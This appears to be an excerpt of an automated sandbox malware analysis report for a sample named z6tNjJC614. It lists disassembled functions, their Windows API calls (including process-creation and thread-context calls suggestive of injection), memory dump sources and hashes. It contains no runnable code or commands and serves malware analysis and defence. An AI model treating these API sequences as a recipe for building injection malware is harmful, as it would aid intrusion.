                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: _memmove
                                                                      • String ID:
                                                                      • API String ID: 4104443479-0
                                                                      • Opcode ID: 75b3ef76dc9c1d7680ff1126038a0b5bca49f3ec50bdc15de679bd26e1e87542
                                                                      • Instruction ID: d636d52262de42e13418aac8bc2a55fb407e73844a35fdacdf9ece9db815b6c1
                                                                      • Opcode Fuzzy Hash: 75b3ef76dc9c1d7680ff1126038a0b5bca49f3ec50bdc15de679bd26e1e87542
                                                                      • Instruction Fuzzy Hash: A13184B160460AAFD704DF6CC8D1DA9BBB9FF48310B158629E519CB291EB30E960CB90
                                                                      Function 005147D0 Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • IsThemeActive.UXTHEME ref: 00514834
                                                                        • Part of subcall function 0053336C: __lock.LIBCMT ref: 00533372
                                                                        • Part of subcall function 0053336C: DecodePointer.KERNEL32(00000001,?,00514849,00567C74), ref: 0053337E
                                                                        • Part of subcall function 0053336C: EncodePointer.KERNEL32(?,?,00514849,00567C74), ref: 00533389
                                                                        • Part of subcall function 005148FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00514915
                                                                        • Part of subcall function 005148FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0051492A
                                                                        • Part of subcall function 00513B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00513B68
                                                                        • Part of subcall function 00513B3A: IsDebuggerPresent.KERNEL32 ref: 00513B7A
                                                                        • Part of subcall function 00513B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,005D52F8,005D52E0,?,?), ref: 00513BEB
                                                                        • Part of subcall function 00513B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00513C6F
                                                                      • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00514874
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                                      • String ID:
                                                                      • API String ID: 1438897964-0
                                                                      • Opcode ID: 3081ea1fc30dca86b64d2b265efb3fc2e9af3705e230c54bc4055494923ec2c9
                                                                      • Instruction ID: 237e005c2b52ef835b4299ff1e6e44af73b8355865e4f3845f5a127faddad4b6
                                                                      • Opcode Fuzzy Hash: 3081ea1fc30dca86b64d2b265efb3fc2e9af3705e230c54bc4055494923ec2c9
                                                                      • Instruction Fuzzy Hash: 4B118C71909302ABDB10DF68D84994EBFE8FBE9750F10491BF040832B1EB70958DDB92
                                                                      Function 00530DB6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 0053571C: __FF_MSGBANNER.LIBCMT ref: 00535733
                                                                        • Part of subcall function 0053571C: __NMSG_WRITE.LIBCMT ref: 0053573A
                                                                        • Part of subcall function 0053571C: RtlAllocateHeap.NTDLL(00FF0000,00000000,00000001,00000000,?,?,?,00530DD3,?), ref: 0053575F
                                                                      • std::exception::exception.LIBCMT ref: 00530DEC
                                                                      • __CxxThrowException@8.LIBCMT ref: 00530E01
                                                                        • Part of subcall function 0053859B: RaiseException.KERNEL32(?,?,?,005C9E78,00000000,?,?,?,?,00530E06,?,005C9E78,?,00000001), ref: 005385F0
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                      • String ID:
                                                                      • API String ID: 3902256705-0
                                                                      • Opcode ID: 6ffb84190be9b2a79c9c0c8f3f2b86fe350fbd279e517034ab133af1480785d3
                                                                      • Instruction ID: 4580026376e6c36b88fd0308f1f0be7ccfbcf7b4c1f649d4d3104b2f2e64cd0e
                                                                      • Opcode Fuzzy Hash: 6ffb84190be9b2a79c9c0c8f3f2b86fe350fbd279e517034ab133af1480785d3
                                                                      • Instruction Fuzzy Hash: 7AF0F43150031A66CB14BAD8EC1AAEE7FECBF41310F000829F814A6982EF709A41D2D1
                                                                      Function 005353A6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00538B28: __getptd_noexit.LIBCMT ref: 00538B28
                                                                      • __lock_file.LIBCMT ref: 005353EB
                                                                        • Part of subcall function 00536C11: __lock.LIBCMT ref: 00536C34
                                                                      • __fclose_nolock.LIBCMT ref: 005353F6
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                      • String ID:
                                                                      • API String ID: 2800547568-0
                                                                      • Opcode ID: 6f4fe1dd07cbe718f4c54ff8c9ff761a99746203da1202abaeec26be6c624c47
                                                                      • Instruction ID: c5d634cee9efd64d004126638997187d5e29ea5053b75242e22b301bd9ae0f5b
                                                                      • Opcode Fuzzy Hash: 6f4fe1dd07cbe718f4c54ff8c9ff761a99746203da1202abaeec26be6c624c47
                                                                      • Instruction Fuzzy Hash: DEF0BB71801B069ADB15BF7598097BD7FE07F81374F259908B424AB1C1DFFC49415B51
                                                                      Function 01035265 Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 01035A23
                                                                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01035AB9
                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01035ADB
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1302191664.0000000001033000.00000040.00000020.00020000.00000000.sdmp, Offset: 01033000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1033000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                      • String ID:
                                                                      • API String ID: 2438371351-0
                                                                      • Opcode ID: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
                                                                      • Instruction ID: 3c08d7ae84fe226cdea0e4503776887bf5723a8bc8dc5e6dd6957e759efa27bf
                                                                      • Opcode Fuzzy Hash: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
                                                                      • Instruction Fuzzy Hash: 4712DF24E24658C6EB24DF64D8507DEB272EF68300F1090E9910DEB7A5E77A4F81CF5A
                                                                      Function 00530C08 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: ProtectVirtual
                                                                      • String ID:
                                                                      • API String ID: 544645111-0
                                                                      • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                      • Instruction ID: 15aab9717a086c24212853aba250c1470fe2fc1683b3d8774b6d903380f90f6c
                                                                      • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                      • Instruction Fuzzy Hash: 4931D570A002099BC719DF58C4A4A69FBA6FB59300F64A7A5E80ACB391D731EDD1DBC0
                                                                      Function 0054FCAC Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: ClearVariant
                                                                      • String ID:
                                                                      • API String ID: 1473721057-0
                                                                      • Opcode ID: 811bcf4ad6b32ad8d5f826472a404708c540b3fa30f8a2214e4089323d6a0ccb
                                                                      • Instruction ID: 4670d411b869e0a7b8958d7f35a1c8a61a26342e381a16f6c6e3c44feacf155c
                                                                      • Opcode Fuzzy Hash: 811bcf4ad6b32ad8d5f826472a404708c540b3fa30f8a2214e4089323d6a0ccb
                                                                      • Instruction Fuzzy Hash: 2E4106746043519FEB15DF14C458B5ABFE1BF85318F0988ACE8998B362C732EC85CB92
                                                                      Function 00517B53 Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: _memmove
                                                                      • String ID:
                                                                      • API String ID: 4104443479-0
                                                                      • Opcode ID: c98837653a9d4ea4f902425dcbb39982046c5a0ca5d72332fe2934ac4061c3b5
                                                                      • Instruction ID: 151ce1db5a8526994f8e732b0328f2288f82a4184f33093f84aa9b155d55b97e
                                                                      • Opcode Fuzzy Hash: c98837653a9d4ea4f902425dcbb39982046c5a0ca5d72332fe2934ac4061c3b5
                                                                      • Instruction Fuzzy Hash: 07213872608A09EBEB144F55EC86BE97FB8FB64355F20886DE485C5090FB30D4D0E745
                                                                      Function 00514DDD Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00514BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00514BEF
                                                                        • Part of subcall function 0053525B: __wfsopen.LIBCMT ref: 00535266
                                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,005D52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00514E0F
                                                                        • Part of subcall function 00514B6A: FreeLibrary.KERNEL32(00000000), ref: 00514BA4
                                                                        • Part of subcall function 00514C70: _memmove.LIBCMT ref: 00514CBA
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Library$Free$Load__wfsopen_memmove
                                                                      • String ID:
                                                                      • API String ID: 1396898556-0
                                                                      • Opcode ID: df7eefcfbf49adb3ab47227c3efb065beb16a0c3ac75cbc18d5b97736bd5be15
                                                                      • Instruction ID: 6072857d03a97897241a6fad9fdf8c9fa3c348aa31ac161e4bfd5996eccabd64
                                                                      • Opcode Fuzzy Hash: df7eefcfbf49adb3ab47227c3efb065beb16a0c3ac75cbc18d5b97736bd5be15
                                                                      • Instruction Fuzzy Hash: FF11C131600206ABEF10AF70C81AFEE7FA9BF84710F108829F541E7181EA719E419F61
                                                                      Function 0054FD85 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: ClearVariant
                                                                      • String ID:
                                                                      • API String ID: 1473721057-0
                                                                      • Opcode ID: 4e75b6efc16617a7334f1d37371a1dd3f37ba7e7e422deef003cf3990c603795
                                                                      • Instruction ID: ab920c86cbfc6a75f86a4bbffb07e5353a0e5829f9f48796cbc7d27ad12f2159
                                                                      • Opcode Fuzzy Hash: 4e75b6efc16617a7334f1d37371a1dd3f37ba7e7e422deef003cf3990c603795
                                                                      • Instruction Fuzzy Hash: 382144B0608302DFDB15DF24C454A5ABFE5BF88314F05886CF88A87762D731E849CB92
                                                                      Function 00534863 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __lock_file.LIBCMT ref: 005348A6
                                                                        • Part of subcall function 00538B28: __getptd_noexit.LIBCMT ref: 00538B28
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: __getptd_noexit__lock_file
                                                                      • String ID:
                                                                      • API String ID: 2597487223-0
                                                                      • Opcode ID: 4177a3aec3d14dd29133de164b09cede5dff787974838f511bc3954396e7328c
                                                                      • Instruction ID: e9dc09a4f3eb7311b760de862520e867fdd5994f961c7e4c566efedd08dece00
                                                                      • Opcode Fuzzy Hash: 4177a3aec3d14dd29133de164b09cede5dff787974838f511bc3954396e7328c
                                                                      • Instruction Fuzzy Hash: AFF0C23290170AEBDF15AFB48C0A7AEBFA0FF41325F158418F4249A191CB789951DF51
                                                                      Function 00514E4A Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • FreeLibrary.KERNEL32(?,?,005D52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00514E7E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: FreeLibrary
                                                                      • String ID:
                                                                      • API String ID: 3664257935-0
                                                                      • Opcode ID: 9e820868afc01607b2790cc049d2c2249735ae7b3d436336a4c34ecfd178ff80
                                                                      • Instruction ID: 9f0f27974ffea6ff6b3b6fdae2fb09e051928c916d9dce609dcd658861f98462
                                                                      • Opcode Fuzzy Hash: 9e820868afc01607b2790cc049d2c2249735ae7b3d436336a4c34ecfd178ff80
                                                                      • Instruction Fuzzy Hash: 1CF03075501711CFDB349F64E494853BFE9BF543253109E3EE1D682610C7319884DF81
                                                                      Function 00530791 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 005307B0
                                                                        • Part of subcall function 00517BCC: _memmove.LIBCMT ref: 00517C06
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: LongNamePath_memmove
                                                                      • String ID:
                                                                      • API String ID: 2514874351-0
                                                                      • Opcode ID: 43ff5de6eb230ec54ef936c9b4522dc6879e4dcdf462be9fd591033819b4c957
                                                                      • Instruction ID: 7562f34e97958925888d3673f28d1762a7fe3cb32891e5aa2acf50b62412ab99
                                                                      • Opcode Fuzzy Hash: 43ff5de6eb230ec54ef936c9b4522dc6879e4dcdf462be9fd591033819b4c957
                                                                      • Instruction Fuzzy Hash: BFE0863690412957C72096589C09FEA77ADEBC86A0F0541B6FC08D7205DA609C808690
                                                                      Function 0053525B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: __wfsopen
                                                                      • String ID:
                                                                      • API String ID: 197181222-0
                                                                      • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                      • Instruction ID: 71e43971b835480f873ce1168d8116b2c431a8f7a709ba9e3ddd60887b7668ac
                                                                      • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                      • Instruction Fuzzy Hash: 48B0927A44020C77CE012A92EC02A4A3F19AB81764F408020FB0C18162A673E6649A89
                                                                      Function 01036264 Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • Sleep.KERNELBASE(000001F4), ref: 01036279
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1302191664.0000000001033000.00000040.00000020.00020000.00000000.sdmp, Offset: 01033000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1033000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Sleep
                                                                      • String ID:
                                                                      • API String ID: 3472027048-0
                                                                      • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                      • Instruction ID: d46754f7fd6492f220e074453a597a96a13ae17ccbc7899d9792760481f63250
                                                                      • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                      • Instruction Fuzzy Hash: 4AE0BF7494020DEFDB00DFA4D5496DD7BB4EF44301F1005A1FD05D7680DB319E648A62
                                                                      Function 01036268 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • Sleep.KERNELBASE(000001F4), ref: 01036279
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1302191664.0000000001033000.00000040.00000020.00020000.00000000.sdmp, Offset: 01033000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1033000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Sleep
                                                                      • String ID:
                                                                      • API String ID: 3472027048-0
                                                                      • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                      • Instruction ID: c3a7db1245afc7d1f8fab528af550e68daf2e6f81fd062b44629163f638e2ce9
                                                                      • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                      • Instruction Fuzzy Hash: DCE0BF7494020DAFDB00DFA4D54969D7BB4EF44301F100161FD0592280D6319A608A62

                                                                      Non-executed Functions

                                                                      Function 0059CABC Relevance: 75.9, APIs: 40, Strings: 3, Instructions: 632windowkeyboardCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00512612: GetWindowLongW.USER32(?,000000EB), ref: 00512623
                                                                      • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0059CB37
                                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0059CB95
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 0059CBD6
                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0059CC00
                                                                      • SendMessageW.USER32 ref: 0059CC29
                                                                      • _wcsncpy.LIBCMT ref: 0059CC95
                                                                      • GetKeyState.USER32(00000011), ref: 0059CCB6
                                                                      • GetKeyState.USER32(00000009), ref: 0059CCC3
                                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0059CCD9
                                                                      • GetKeyState.USER32(00000010), ref: 0059CCE3
                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0059CD0C
                                                                      • SendMessageW.USER32 ref: 0059CD33
                                                                      • SendMessageW.USER32(?,00001030,?,0059B348), ref: 0059CE37
                                                                      • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0059CE4D
                                                                      • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0059CE60
                                                                      • SetCapture.USER32(?), ref: 0059CE69
                                                                      • ClientToScreen.USER32(?,?), ref: 0059CECE
                                                                      • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0059CEDB
                                                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0059CEF5
                                                                      • ReleaseCapture.USER32 ref: 0059CF00
                                                                      • GetCursorPos.USER32(?), ref: 0059CF3A
                                                                      • ScreenToClient.USER32(?,?), ref: 0059CF47
                                                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 0059CFA3
                                                                      • SendMessageW.USER32 ref: 0059CFD1
                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 0059D00E
                                                                      • SendMessageW.USER32 ref: 0059D03D
                                                                      • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0059D05E
                                                                      • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0059D06D
                                                                      • GetCursorPos.USER32(?), ref: 0059D08D
                                                                      • ScreenToClient.USER32(?,?), ref: 0059D09A
                                                                      • GetParent.USER32(?), ref: 0059D0BA
                                                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 0059D123
                                                                      • SendMessageW.USER32 ref: 0059D154
                                                                      • ClientToScreen.USER32(?,?), ref: 0059D1B2
